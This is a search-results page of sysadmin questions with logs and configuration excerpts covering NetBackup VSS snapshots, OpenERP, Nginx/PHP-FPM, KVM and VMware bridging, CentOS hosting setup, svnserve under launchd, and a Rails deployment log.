Search Results

Search found 8408 results on 337 pages for 'cgi bin'.

Page 323/337 | < Previous Page | 319 320 321 322 323 324 325 326 327 328 329 330  | Next Page >

  • NetBackup with VSS and Instant Recovery - Failing to delete old snapshots

    - by Jonathan Bourke
    We are attempting to implement Microsoft VSS for snap-shotting in our NetBackup 6.5.3.1 environment. The clients are both 32 & 64 bit Windows 2003 Server. Snapshot parameters are: Instant recovery is enabled Maximum snapshots = 1 Provider type = 1 (System) Snapshot attribute = 1 (Differential) All backups successfully complete, and VSS shadows are successfully created both for the snapshot backup and for the open files (shadow copy components). The Issue: NetBackup is not clearing or overwriting old snapshots with each successive backup. When we list shadows, and shadow storage, it is increasing and increasing. IT is not honouring the Maximum Snapshot setting. The Logs: The bpfis log doesn’t really appear to show any errors other than for methods which we are not employing (VxVM, Flashsnap, etc.). A section is as follows: 11:54:10.744 [348.4724] <2> logparams: D:\Program Files\Veritas\NetBackup\bin\bpfis.exe delete -nbu -id htpststr001.san.mgmt.det_1248918143 -bpstart_to 300 -bpend_to 300 -clnt htpststr001.san.mgmt.det 11:54:10.744 [348.4724] <4> bpfis: INF - BACKUP START 348 11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: VfMS error 10; see following messages: 11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: Non-fatal method error was reported 11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: vfm_configure_fi_one: method: FlashSnap, type: FIM, function: FlashSnap_init 11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: VfMS method error 3; see following message: 11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: FlashSnap_init: Veritas Volume Manager not installed. 11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: VfMS error 10; see following messages: 11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: Non-fatal method error was reported 11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: vfm_configure_fi_one: method: vxvm, type: FIM, function: vxvm_init 11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: VfMS method error 3; see following message: 11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: vxvm_init: Veritas Volume Manager not installed. 11:54:11.713 [348.4724] <4> onlfi_thaw: Thawing C:\ using snapshot method VSS. 11:54:11.713 [348.4724] <2> onlfi_vfms_logf: vfm_thaw: delete snapshot ... 11:54:11.744 [348.4724] <2> onlfi_vfms_logf: snapshot services: emcclariionfi:Thu Jul 30 2009 11:54:11.744000 <Thread id - 4724> Unable to import any login credentials for any appliances. 11:54:11.760 [348.4724] <2> onlfi_vfms_logf: snapshot services: hpevafi:Thu Jul 30 2009 11:54:11.760000 <Thread id - 4724> CHpEvaPlugin::init: CLI tool is not installed. 11:54:11.760 [348.4724] <2> onlfi_vfms_logf: snapshot services: hpmsafi:Thu Jul 30 2009 11:54:11.760000 <Thread id - 4724> No array mangement credentials are available in configuration file. 11:54:13.806 [348.4724] <4> onlfi_thaw: do_thaw return value: 0 11:54:13.806 [348.4724] <4> onlfi_thaw: Thawing D:\ using snapshot method VSS. 11:54:15.806 [348.4724] <4> onlfi_thaw: do_thaw return value: 0 11:54:19.806 [348.4724] <2> fis_delete_id: removing D:\Program Files\Veritas\NetBackup\online_util\fi_cntl\bpfis.fim.htpststr001.san.mgmt.det_1248918143.0 11:54:19.806 [348.4724] <2> fis_delete_id: removing D:\Program Files\Veritas\NetBackup\online_util\fi_cntl\bpfis.fim.htpststr001.san.mgmt.det_1248918143.0.fiid 11:54:19.853 [348.4724] <4> bpfis: INF - EXIT STATUS 0: the requested operation was successfully completed The Question: Has anyone any experience of NetBackup / VSS not clearing snapshots after backups? We will ultimately be using a HP EVA for the snapshots, but we want to ensure correct functioning at a VSS level before we go further. Regards, Jonathan (PS: Question previously posted by my colleague on entsupport.symantec.com)

    Read the article

  • openerp error openid module

    - by spy86
    I installed OpenERP server Centos 6.4. When I try to start the server with OpenERP module auth_openid I gets this error: [openerp@ bin]$ ./openerp-server --load=web,auth_openid 2013-10-22 13:02:18,705 22381 INFO ? openerp: OpenERP version 7.0 2013-10-22 13:02:18,705 22381 INFO ? openerp: addons paths: /opt/openerp/openerp-sr-preprod/current/server/openerp/addons 2013-10-22 13:02:18,705 22381 INFO ? openerp: database hostname: localhost 2013-10-22 13:02:18,705 22381 INFO ? openerp: database port: 5432 2013-10-22 13:02:18,705 22381 INFO ? openerp: database user: openerp 2013-10-22 13:02:18,706 22381 WARNING ? openerp.modules.module: module web: module not found 2013-10-22 13:02:18,707 22381 CRITICAL ? openerp.modules.module: Couldn't load module web 2013-10-22 13:02:18,707 22381 CRITICAL ? openerp.modules.module: No module named web 2013-10-22 13:02:18,707 22381 ERROR ? openerp.service: Failed to load server-wide module web. The web module is provided by the addons found in the openerp-web project. Maybe you forgot to add those addons in your addons_path configuration. Traceback (most recent call last): File "/opt/openerp/openerp-sr-preprod/current/server/openerp/service/init.py", line 60, in load_server_wide_modules openerp.modules.module.load_openerp_module(m) File "/opt/openerp/openerp-sr-preprod/current/server/openerp/modules/module.py", line 405, in load_openerp_module import('openerp.addons.' + module_name) File "/opt/openerp/openerp-sr-preprod/current/server/openerp/modules/module.py", line 132, in load_module f, path, descr = imp.find_module(module_part, ad_paths) ImportError: No module named web 2013-10-22 13:02:18,707 22381 WARNING ? openerp.modules.module: module auth_openid: module not found 2013-10-22 13:02:18,708 22381 CRITICAL ? openerp.modules.module: Couldn't load module auth_openid 2013-10-22 13:02:18,708 22381 CRITICAL ? openerp.modules.module: No module named auth_openid 2013-10-22 13:02:18,708 22381 ERROR ? openerp.service: Failed to load server-wide module auth_openid. Traceback (most recent call last): File "/opt/openerp/openerp-sr-preprod/current/server/openerp/service/init.py", line 60, in load_server_wide_modules openerp.modules.module.load_openerp_module(m) File "/opt/openerp/openerp-sr-preprod/current/server/openerp/modules/module.py", line 405, in load_openerp_module import('openerp.addons.' + module_name) File "/opt/openerp/openerp-sr-preprod/current/server/openerp/modules/module.py", line 132, in load_module f, path, descr = imp.find_module(module_part, ad_paths) ImportError: No module named auth_openid 2013-10-22 13:02:18,713 22381 INFO ? openerp: OpenERP server is running, waiting for connections... Exception in thread Thread-1: Traceback (most recent call last): File "/usr/lib64/python2.6/threading.py", line 532, in bootstrap_inner self.run() File "/usr/lib64/python2.6/threading.py", line 484, in run self.__target(*self.__args, **self.__kwargs) File "/opt/openerp/openerp-sr-preprod/current/server/openerp/service/wsgi_server.py", line 436, in serve httpd = werkzeug.serving.make_server(interface, port, application, threaded=True) File "/usr/lib/python2.6/site-packages/Werkzeug-0.7-py2.6.egg/werkzeug/serving.py", line 399, in make_server passthrough_errors, ssl_context) File "/usr/lib/python2.6/site-packages/Werkzeug-0.7-py2.6.egg/werkzeug/serving.py", line 331, in __init HTTPServer.init(self, (host, int(port)), handler) File "/usr/lib64/python2.6/SocketServer.py", line 402, in init self.server_bind() File "/usr/lib64/python2.6/BaseHTTPServer.py", line 108, in server_bind SocketServer.TCPServer.server_bind(self) File "/usr/lib64/python2.6/SocketServer.py", line 413, in server_bind self.socket.bind(self.server_address) File "", line 1, in bind error: [Errno 98] Address already in use Anybody have some advice what's wrong ? Regards

    Read the article

  • Nginx + PHP - No input file specified for 1 server block. Other server block works fine

    - by F21
    I am running Ubuntu Desktop 12.04 with nginx 1.2.6. PHP is PHP-FPM 5.4.9. This is the relevant part of my nginx.conf: http { include mime.types; default_type application/octet-stream; sendfile on; keepalive_timeout 65; server { server_name testapp.com; root /www/app/www/; index index.php index.html index.htm; location ~ \.php$ { fastcgi_intercept_errors on; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; include fastcgi_params; } } server { listen 80 default_server; root /www index index.html index.php; location ~ \.php$ { fastcgi_intercept_errors on; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; include fastcgi_params; } } } Relevant bits from php-fpm.conf: ; Chroot to this directory at the start. This value must be defined as an ; absolute path. When this value is not set, chroot is not used. ; Note: you can prefix with '$prefix' to chroot to the pool prefix or one ; of its subdirectories. If the pool prefix is not set, the global prefix ; will be used instead. ; Note: chrooting is a great security feature and should be used whenever ; possible. However, all PHP paths will be relative to the chroot ; (error_log, sessions.save_path, ...). ; Default Value: not set ;chroot = ; Chdir to this directory at the start. ; Note: relative path can be used. ; Default Value: current directory or / when chroot chdir = /www In my hosts file, I redirect 2 domains: testapp.com and test.com to 127.0.0.1. My web files are all stored in /www. From the above settings, if I visit test.com/phpinfo.php and test.com/app/www, everything works as expected and I get output from PHP. However, if I visit testapp.com, I get the dreaded No input file specified. error. So, at this point, I pull out the log files and have a look: 2012/12/19 16:00:53 [error] 12183#0: *17 FastCGI sent in stderr: "Unable to open primary script: /www/app/www/index.php (No such file or directory)" while reading response header from upstream, client: 127.0.0.1, server: testapp.com, request: "GET / HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "testapp.com" This baffles me because I have checked again and again and /www/app/www/index.php definitely exists! This is also validated by the fact that test.com/app/www/index.php works which means the file exists and the permissions are correct. Why is this happening and what are the root causes of things breaking for just the testapp.com v-host? Just an update to my investigation: I have commented out chroot and chdir in php-fpm.conf to narrow down the problem If I remove the location ~ \.php$ block for testapp.com, then nginx will send me a bin file which contains the PHP code. This means that on nginx's side, things are fine. The problem is that something must be mangling the file paths when passing it to PHP-FPM. Having said that, it is quite strange that the default_server v-host works fine because its root is /www, where as things just won't work for the testapp.com v-host because the root is /www/app/www.

    Read the article

  • Installation error on Ubuntu 11.10

    - by Abhishek Chanda
    I upgraded to Ubuntu 11.10 and now, when I try to install or uninstall a software, I get this error installArchives() failed: (Reading database ... (Reading database ... 5% (Reading database ... 10% (Reading database ... 15% (Reading database ... 20% (Reading database ... 25% (Reading database ... 30% (Reading database ... 35% (Reading database ... 40% (Reading database ... 45% (Reading database ... 50% (Reading database ... 55% (Reading database ... 60% (Reading database ... 65% (Reading database ... 70% (Reading database ... 75% (Reading database ... 80% (Reading database ... 85% (Reading database ... 90% (Reading database ... 95% (Reading database ... 100% (Reading database ... 158945 files and directories currently installed.) Removing aisleriot ... Processing triggers for gconf2 ... Processing triggers for man-db ... Processing triggers for hicolor-icon-theme ... Processing triggers for libglib2.0-0 ... Processing triggers for gnome-menus ... Processing triggers for desktop-file-utils ... Processing triggers for bamfdaemon ... Rebuilding /usr/share/applications/bamf.index... Setting up flashplugin-downloader (11.0.1.152ubuntu1) ... Downloading... --2012-05-02 18:47:29-- http://archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.0.1.152.orig.tar.gz Resolving archive.canonical.com... 91.189.92.150, 91.189.92.191 Connecting to archive.canonical.com|91.189.92.150|:80... connected. HTTP request sent, awaiting response... 404 Not Found 2012-05-02 18:47:29 ERROR 404: Not Found. download failed The Flash plugin is NOT installed. dpkg: error processing flashplugin-downloader (--configure): subprocess installed post-installation script returned error exit status 1 dpkg: dependency problems prevent configuration of flashplugin-installer: flashplugin-installer depends on flashplugin-downloader (>= 11.0.1.152ubuntu1); however: Package flashplugin-downloader is not configured yet. dpkg: error processing flashplugin-installer (--configure): dependency problems - leaving unconfigured No apport report written because the error message indicates its a followup error from a previous failure. Errors were encountered while processing: flashplugin-downloader flashplugin-installer Error in function: SystemError: E:Sub-process /usr/bin/dpkg returned an error code (1) Setting up flashplugin-downloader (11.0.1.152ubuntu1) ... Downloading... --2012-05-02 18:47:33-- http://archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.0.1.152.orig.tar.gz Resolving archive.canonical.com... 91.189.92.191, 91.189.92.150 Connecting to archive.canonical.com|91.189.92.191|:80... connected. HTTP request sent, awaiting response... 404 Not Found 2012-05-02 18:47:34 ERROR 404: Not Found. download failed The Flash plugin is NOT installed. dpkg: error processing flashplugin-downloader (--configure): subprocess installed post-installation script returned error exit status 1 dpkg: dependency problems prevent configuration of flashplugin-installer: flashplugin-installer depends on flashplugin-downloader (>= 11.0.1.152ubuntu1); however: Package flashplugin-downloader is not configured yet. dpkg: error processing flashplugin-installer (--configure): dependency problems - leaving unconfigured This seems to be a bug that has been reported.Does anyone know a workaround?

    Read the article

  • How to set up a centralized backup server with lots of offsite workstations, intermittent internet connectivity, and stubborn users?

    - by Zac B
    This might be an impossible question. Context: We have a bunch of computers across around 1000 users. We have a centralized office where 900 of the users work, most of the time. Most of the computers are laptops. They are very frequently coming on and off the network for hours at a time. Users often take their computers home and do lots of work from home. In addition, there are a handful of users who work elsewhere in the country, who are offline (no internet connection whatsoever) for more than half of the time they use their machines. All of the machines are Windows 7/XP. Problem: People are always losing data. One day someone accidentally deletes a bunch of files. The next day someone else installs a bad driver or tries to mess with something in system32 and needs a personal data backup/reinstall of Windows. Because of how many of our business operations are done without an internet connection, and how frequently computers come on- and offline, it's unfeasible to make users use network storage for all of their data. We tried giving them Dropboxes, and they stored their files elsewhere. We bought and deployed Altiris, and they uninstalled it and blamed us when they couldn't get files back that they accidentally deleted while they were offline and hadn't taken a backup in months. We tried teaching them backup best-practices, and using scheduled sync tools to upload things to the network drives, and they turned them off because they "looked like viruses". It doesn't help that many of these users are pretty high up in the business and are not amicable to any sort of "you need to do something regularly because we say so" solution. Question: Other than finding another job where IT is treated differently and users are willing to follow best practices, how would people recommend I implement a file backup solution that supports the following: Backs up to a centralized server over LAN or WAN whenever a network link becomes available, or on a schedule. Supports interrupted/resumed backups (and hopefully file-delta only backups), since connections to the network (WAN or LAN) are often slow and only open for half an hour or so. Supports relatively rapid, "I accidentally deleted the TPS reports! Oh no!" single-file recovery, ideally administered from the central backup server rather than the client PC. Supports local-to-local file delta backup on a schedule, so that users without a network connection for a few days can still retrieve accidental deletions or whatnot. Ideally, the local stored backups would be pushed up to the server whenever network link is available. Isn't configurable on the clients without certain credentials. Because the CFOs (who won't give up their admin rights on the domain) will disable it if they can. Backs up the entire hard drive. There are people who are self-righteous about storing things in C:\, or in the recycle bin, or in the C:\Windows dir (yes, I know). I'm fine integrating multiple products/solutions, or scripting different programs together myself (I'm a somewhat competent programmer), but I've been drawing a blank on where to start. Dropbox is folder-specific, Altiris doesn't cope with LAN outages or interrupted/resumed backups, Volume Shadow Copy is awesome for a local-to-local solution, but I don't know how to push days of stored shadow copies up to a server in a 2 hour window of network access. The company is fine with spending decent money on this, thousands (USD) on a server, and hundreds on clients, if necessary. I want to emphasize that this isn't a shopping list request. While I wish there was a program out there that did what I want, I've looked pretty hard, and not found anything that fits the bill. Instead, I'm hoping for ideas on where to start hacking things together from scratch/from different technologies to make something stable that works. Cheers!

    Read the article

  • apache2.2 + php5 , process never die and stay blocked to LOCK_SH

    - by Givre
    Server version: Apache/2.2.22 (Unix) Server built: Mar 28 2012 16:31:45 Server's Module Magic Number: 20051115:30 Server loaded: APR 1.4.6, APR-Util 1.4.1 Compiled using: APR 1.4.6, APR-Util 1.4.1 Architecture: 64-bit Server MPM: Prefork threaded: no forked: yes (variable process count) Server compiled with.... -D APACHE_MPM_DIR="server/mpm/prefork" -D APR_HAS_SENDFILE -D APR_HAS_MMAP -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled) -D APR_USE_SYSVSEM_SERIALIZE -D APR_USE_PTHREAD_SERIALIZE -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT -D APR_HAS_OTHER_CHILD -D AP_HAVE_RELIABLE_PIPED_LOGS -D DYNAMIC_MODULE_LIMIT=128 -D HTTPD_ROOT="/opt/apache2" -D SUEXEC_BIN="/opt/apache2/bin/suexec" -D DEFAULT_PIDLOG="logs/httpd.pid" -D DEFAULT_SCOREBOARD="logs/apache_runtime_status" -D DEFAULT_LOCKFILE="logs/accept.lock" -D DEFAULT_ERRORLOG="logs/error_log" -D AP_TYPES_CONFIG_FILE="conf/mime.types" -D SERVER_CONFIG_FILE="conf/httpd.conf" Php5.2.17. Using mod_php5 as a DSO module compiled Problem: On shared webhosting, a lot of apache2 process never stop or die and they waiting as long as apache2 restart. Strace of one of theses process: access("tmp/meta_cache.txt", F_OK) = 0 getcwd("/home/exemple.com/htdocs"..., 4096) = 34 lstat("/var", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/var/www", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/home", {st_mode=S_IFDIR|0755, st_size=1715, ...}) = 0 lstat("/home/exemple.com", {st_mode=S_IFDIR|0755, st_size=16, ...}) = 0 lstat("/home/exemple.com/htdocs", {st_mode=S_IFDIR|0770, st_size=51, ...}) = 0 lstat("/home/exemple.com/htdocs/tmp", {st_mode=S_IFDIR|0777, st_size=51, ...}) = 0 lstat("/home/exemple.com/htdocs/tmp/meta_cache.txt", {st_mode=S_IFREG|0666, st_size=8901, ...}) = 0 lstat("/var", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/var/www", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/home", {st_mode=S_IFDIR|0755, st_size=1715, ...}) = 0 lstat("/home/exemple.com", {st_mode=S_IFDIR|0755, st_size=16, ...}) = 0 lstat("/home/exemple.com/htdocs", {st_mode=S_IFDIR|0770, st_size=51, ...}) = 0 lstat("/home/exemple.com/htdocs/tmp", {st_mode=S_IFDIR|0777, st_size=51, ...}) = 0 lstat("/home/exemple.com/htdocs/tmp/meta_cache.txt", {st_mode=S_IFREG|0666, st_size=8901, ...}) = 0 lstat("/var", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/var/www", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/home", {st_mode=S_IFDIR|0755, st_size=1715, ...}) = 0 lstat("/home/exemple.com", {st_mode=S_IFDIR|0755, st_size=16, ...}) = 0 getcwd("/home/exemple.com/htdocs"..., 4096) = 34 lstat("/var", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/var/www", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 lstat("/home", {st_mode=S_IFDIR|0755, st_size=1715, ...}) = 0 lstat("/home/exemple.com", {st_mode=S_IFDIR|0755, st_size=16, ...}) = 0 lstat("/home/exemple.com/htdocs", {st_mode=S_IFDIR|0770, st_size=51, ...}) = 0 lstat("/home/exemple.com/htdocs/tmp", {st_mode=S_IFDIR|0777, st_size=51, ...}) = 0 lstat("/home/exemple.com/htdocs/tmp/meta_cache.txt", {st_mode=S_IFREG|0666, st_size=8901, ...}) = 0 open("/home/exemple.com/htdocs/tmp/meta_cache.txt", O_RDONLY) = 10905 fstat(10905, {st_mode=S_IFREG|0666, st_size=8901, ...}) = 0 lseek(10905, 0, SEEK_CUR) = 0 flock(10905, LOCK_SH) = The process never die, and stay like this. All files are on NFS V3 I'dont know how to solve this problem or find more informations. The effect is that all apache2 process become used and apache2 crash totaly . Thanks for you help.

    Read the article

  • Set up lnux box for hosting a-z

    - by microchasm
    I am in the process of reinstalling the OS on a machine that will be used to host a couple of apps for our business. The apps will be local only; access from external clients will be via vpn only. The prior setup used a hosting control panel (Plesk) for most of the admin, and I was looking at using another similar piece of software for the reinstall - but I figured I should finally learn how it all works. I can do most of the things the software would do for me, but am unclear on the symbiosis of it all. This is all an attempt to further distance myself from the land of Configuration Programmer/Programmer, if at all possible. I can't find a full walkthrough anywhere for what I'm looking for, so I thought I'd put up this question, and if people can help me on the way I will edit this with the answers, and document my progress/pitfalls. Hopefully someday this will help someone down the line. The details: CentOS 5.5 x86_64 httpd: Apache/2.2.3 mysql: 5.0.77 (to be upgraded) php: 5.1 (to be upgraded) The requirements: SECURITY!! Secure file transfer Secure client access (SSL Certs and CA) Secure data storage Virtualhosts/multiple subdomains Local email would be nice, but not critical The Steps: Download latest CentOS DVD-iso (torrent worked great for me). Install CentOS: While going through the install, I checked the Server Components option thinking I was going to be using another Plesk-like admin. In hindsight, considering I've decided to try to go my own way, this probably wasn't the best idea. Basic config: Setup users, networking/ip address etc. Yum update/upgrade. Upgrade PHP: To upgrade PHP to the latest version, I had to look to another repo outside CentOS. IUS looks great and I'm happy I found it! cd /tmp #wget http://dl.iuscommunity.org/pub/ius/stable/Redhat/5/x86_64/epel-release-1-1.ius.el5.noarch.rpm #rpm -Uvh epel-release-1-1.ius.el5.noarch.rpm #wget http://dl.iuscommunity.org/pub/ius/stable/Redhat/5/x86_64/ius-release-1-4.ius.el5.noarch.rpm #rpm -Uvh ius-release-1-4.ius.el5.noarch.rpm yum list | grep -w \.ius\. [will list all packages available in the IUS repo] rpm -qa | grep php [will list installed packages needed to be removed. the installed packages need to be removed before you can install the IUS packages otherwise there will be conflicts] #yum shell >remove php-gd php-cli php-odbc php-mbstring php-pdo php php-xml php-common php-ldap php-mysql php-imap Setting up Remove Process >install php53 php53-mcrypt php53-mysql php53-cli php53-common php53-ldap php53-imap php53-devel >transaction solve >transaction run Leaving Shell #php -v PHP 5.3.2 (cli) (built: Apr 6 2010 18:13:45) This process removes the old version of PHP and installs the latest. To upgrade mysql: Pretty much the same process as above with PHP #/etc/init.d/mysqld stop [OK] rpm -qa | grep mysql [installed mysql packages] #yum shell >remove mysql mysql-server Setting up Remove Process >install mysql51 mysql51-server mysql51-devel >transaction solve >transaction run Leaving Shell #service mysqld start [OK] #mysql -v Server version: 5.1.42-ius Distributed by The IUS Community Project The above upgrade instructions courtesy of IUS wiki: http://wiki.iuscommunity.org/Doc/ClientUsageGuide Create a chroot jail to hold sftp user via rssh. This will force SCP/SFTP and will circumvent traditional FTP server setup. #cd /tmp #wget http://dag.wieers.com/rpm/packages/rssh/rssh-2.3.2-1.2.el5.rf.x86_64.rpm #rpm -ivh rssh-2.3.2-1.2.el5.rf.x86_64.rpm #useradd -m -d /home/dev -s /usr/bin/rssh dev #passwd dev Edit /etc/rssh.conf to grant access to SFTP to rssh users. #vi /etc/rssh.conf Uncomment line allowscp This allows me to connect to the machine via SFTP protocol in Transmit (my FTP program of choice; I'm sure it's similar with other FTP apps). Above instructions for SFTP appropriated (with appreciation!) from http://www.cyberciti.biz/tips/linux-unix-restrict-shell-access-with-rssh.html And this is where I'm at. I will keep editing this as I make progress. Any tips on how to Configure virtual interfaces/ip based virtual hosts for SSL, setting up a CA, or anything else would be appreciated.

    Read the article

  • Bridged virtual interface is not available or visible to ifconfig.

    - by Omniwombat
    Hello all. I'm running Ubuntu 9.04, kernel 2.6.28-18, and vmware-server 2.0.1. I'm attempting to setup a virtual linux machine to use a bridged interface rather than NAT or host-only. Both NAT and host-only work just fine. When running vmware-config.pl, I set /dev/vmnet0 to bridge eth0, /dev/vmnet1 to host-only, and /dev/vmnet8 to NAT. When I run ifconfig -a I see the physical interface (eth0), vmnet1 and vmnet8 both of which are up and have IP addresses assigned to them. I also see other various interfaces that are not relevant here. In the web console, when I ask that the guest machine's network card be bridged, it states that a bridged setup is "Not available" and shows the disabled device icon. Inside the guest machine, I do have an eth0 interface which I can set to anything I like, however it can't see my external network, or the host. I do see errors in my vmware/hostd.log which state: "The network bridge on device vmnet0 is not running. The virtual machine will not be able to communicate with the host or with other machines on your network" which confirms the problem. vmnet-bridge is running, and I see the following in my process table: /usr/bin/vmnet-bridge -d /var/run/vmnet-bridge-0.pid -n 0 -i eth0 I confirm that the /var/run/vmnet-bridge-0.pid file is there and that it points to the correct process. I saw this question relating to Ubuntu 9.04 and bridged interfaces, in which the poster determined that the vsock library was not getting built due to a flaw in the vmware-config.pl script. I applied the patch, reran the script, and confirm that vsock.ko and vsock.o are in my /lib directory structure. vsock does show up in an lsmod. My /etc/vmware directory has /vmnet1 and /vmnet8 subdirectories. They contain configuration utilities for running DHCP and nat type services as expected. There is no vmnet0 subdirectory. My /etc/vmware/netmap.conf file DOES show entries for vmnet0; both the name and the device as I configured it from the script. My /dev directory contains devices vmnet0 through vmnet9. They have major device number 119, and minor device numbers 0 through 9. /proc/net/dev shows statistics for vmnet1 and vmnet8, but not vmnet0. I have a /proc/vmnet directory, but it's empty. When I start or stop the vmware service with /etc/init.d/vmware start, I see the following: Starting VMware services: Virtual machine monitor done Virtual machine communication interface done VM communication interface socket family: done Virtual ethernet done Bridged networking on /dev/vmnet0 done Host-only networking on /dev/vmnet1 (background) done DHCP server on /dev/vmnet1 done Host-only networking on /dev/vmnet8 (background) done DHCP server on /dev/vmnet8 done NAT service on /dev/vmnet8 done VMware Server Authentication Daemon (background) done Shared Memory Available done Starting VMware management services: VMware Server Host Agent (background) done VMware Virtual Infrastructure Web Access Starting VMware autostart virtual machines: Virtual machines done Nothing appears to be wrong there. What n00b thing am I doing such that vmnet0 and only vmnet0 does not show up in the interface list?

    Read the article

  • ubuntu 10.04; kvm bridged networking not working with public ip addresses

    - by senorsmile
    I have a dedicated hosted server box with ubuntu 10.04 64 bit installed. I would like to run kvm with ubuntu 8.04 installed for some php 5.2 compatible apps(they don't work right with php 5.3, the default in ubuntu 10.04). I installed KVM as instructed at https://help.ubuntu.com/community/KVM/Installation . I installed the vm using virt-manager. I never could figure out how use virt-install or any of those automated installers. I just installed it using the disc. I set up bridged networking as per https://help.ubuntu.com/community/KVM/Networking . However, the bridged connection doesn't work. Here's my /etc/network/interfaces on the host, running ubuntu 10.04. (with specific public ip blanked) auto lo iface lo inet loopback auto eth0 iface eth0 inet manual auto br0 iface br0 inet static address xx.xx.xx.xx netmask 255.255.255.248 gateway xx.xx.xx.xa bridge_ports eth0 bridge_stp on bridge_fd 0 bridge_maxwait 10 ` Here's my /etc/network/interfaces on the guest, running ubuntu 8.04. auto lo iface lo inet loopback auto eth0 iface eth0 inet static address xx.xx.xx.xy netmask 255.255.255.248 gateway xx.xx.xx.xa The two vm's can communicate to each other. But, the guest vm can't access anyone in the real world. Here's my /etc/libvirt/qemu/store_804.xml <domain type='kvm'> <name>store_804</name> <uuid>27acfb75-4f90-a34c-9a0b-70a6927ae84c</uuid> <memory>2097152</memory> <currentMemory>2097152</currentMemory> <vcpu>2</vcpu> <os> <type arch='x86_64' machine='pc-0.12'>hvm</type> <boot dev='hd'/> </os> <features> <acpi/> <apic/> <pae/> </features> <clock offset='utc'/> <on_poweroff>destroy</on_poweroff> <on_reboot>restart</on_reboot> <on_crash>restart</on_crash> <devices> <emulator>/usr/bin/kvm</emulator> <disk type='file' device='disk'> <driver name='qemu' type='raw'/> <source file='/var/lib/libvirt/images/store_804.img'/> <target dev='hda' bus='ide'/> </disk> <disk type='block' device='cdrom'> <driver name='qemu' type='raw'/> <target dev='hdc' bus='ide'/> <readonly/> </disk> <interface type='bridge'> <mac address='52:54:00:26:0b:c6'/> <source bridge='br0'/> <model type='virtio'/> </interface> <console type='pty'> <target port='0'/> </console> <console type='pty'> <target port='0'/> </console> <input type='mouse' bus='ps2'/> <graphics type='vnc' port='-1' autoport='yes'/> <sound model='es1370'/> <video> <model type='cirrus' vram='9216' heads='1'/> </video> </devices> </domain> Any idea where I've gone wrong?

    Read the article

  • Automatically starting svnserve on Snow Leopard

    - by Cleggy
    I have installed Subversion onto my iMac running Snow Leopard, but am having trouble getting svnserve to start up automatically. As I understand it (I'm still fairly green with OSX), the best way to do that is to utilize launchd. To that end, I have created the following .plist file in the /Library/LaunchDaemons folder. If I use launchctl to execute this file, svnserve starts as expected, but it doesn't automatically start when the system starts up or I log in. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Disabled</key> <false/> <key>Label</key> <string>org.tigris.subversion.svnserve</string> <key>UserName</key> <string>Dave</string> <key>ProgramArguments</key> <array> <string>/opt/subversion/bin/svnserve</string> <string>--inetd</string> <string>--root=/Users/Shared/SVNrep</string> </array> <key>ServiceDescription</key> <string>Subversion Standalone Server</string> <key>Sockets</key> <dict> <key>Listeners</key> <array> <dict> <key>SockFamily</key> <string>IPv4</string> <key>SockServiceName</key> <string>svn</string> <key>SockType</key> <string>stream</string> </dict> <dict> <key>SockFamily</key> <string>IPv6</string> <key>SockServiceName</key> <string>svn</string> <key>SockType</key> <string>stream</string> </dict> </array> </dict> <key>inetdCompatibility</key> <dict> <key>Wait</key> <false/> </dict> </dict> </plist> If anyone here could provide any suggestions as to how to get this to work, I'd really appreciate it.

    Read the article

  • Rails app deployment challenge, not finding database table in production.log

    - by Stefan M
    I'm trying to setup PasswordPusher as my first ruby app ever. Building and running the webrick server as instructed in README works fine. It was only when I tried to add Apache ProxyPass and ProxyPassReverse that the page load slowed down to several minutes. So I gave mod_passenger a whirl but now it's unable to find the password table. Here's what I get in log/production.log. Started GET "/" for 10.10.2.13 at Sun Jun 10 08:07:19 +0200 2012 Processing by PasswordsController#new as HTML Completed 500 Internal Server Error in 1ms ActiveRecord::StatementInvalid (Could not find table 'passwords'): app/controllers/passwords_controller.rb:77:in `new' app/controllers/passwords_controller.rb:77:in `new' While in log/private.log I get a lot more output so here's just a snippet but it looks to me like it's working with the database. Edit: This was actually old log output, maybe from db:create. Migrating to AddUserToPassword (20120220172426) (0.3ms) ALTER TABLE "passwords" ADD "user_id" integer (0.0ms) PRAGMA index_list("passwords") (0.2ms) CREATE INDEX "index_passwords_on_user_id" ON "passwords" ("user_id") (0.7ms) INSERT INTO "schema_migrations" ("version") VALUES ('20120220172426') (0.1ms) select sqlite_version(*) (0.1ms) SELECT "schema_migrations"."version" FROM "schema_migrations" (0.0ms) PRAGMA index_list("passwords") (0.0ms) PRAGMA index_info('index_passwords_on_user_id') (4.6ms) PRAGMA index_list("rails_admin_histories") (0.0ms) PRAGMA index_info('index_rails_admin_histories') (0.0ms) PRAGMA index_list("users") (4.8ms) PRAGMA index_info('index_users_on_unlock_token') (0.0ms) PRAGMA index_info('index_users_on_reset_password_token') (0.0ms) PRAGMA index_info('index_users_on_email') (0.0ms) 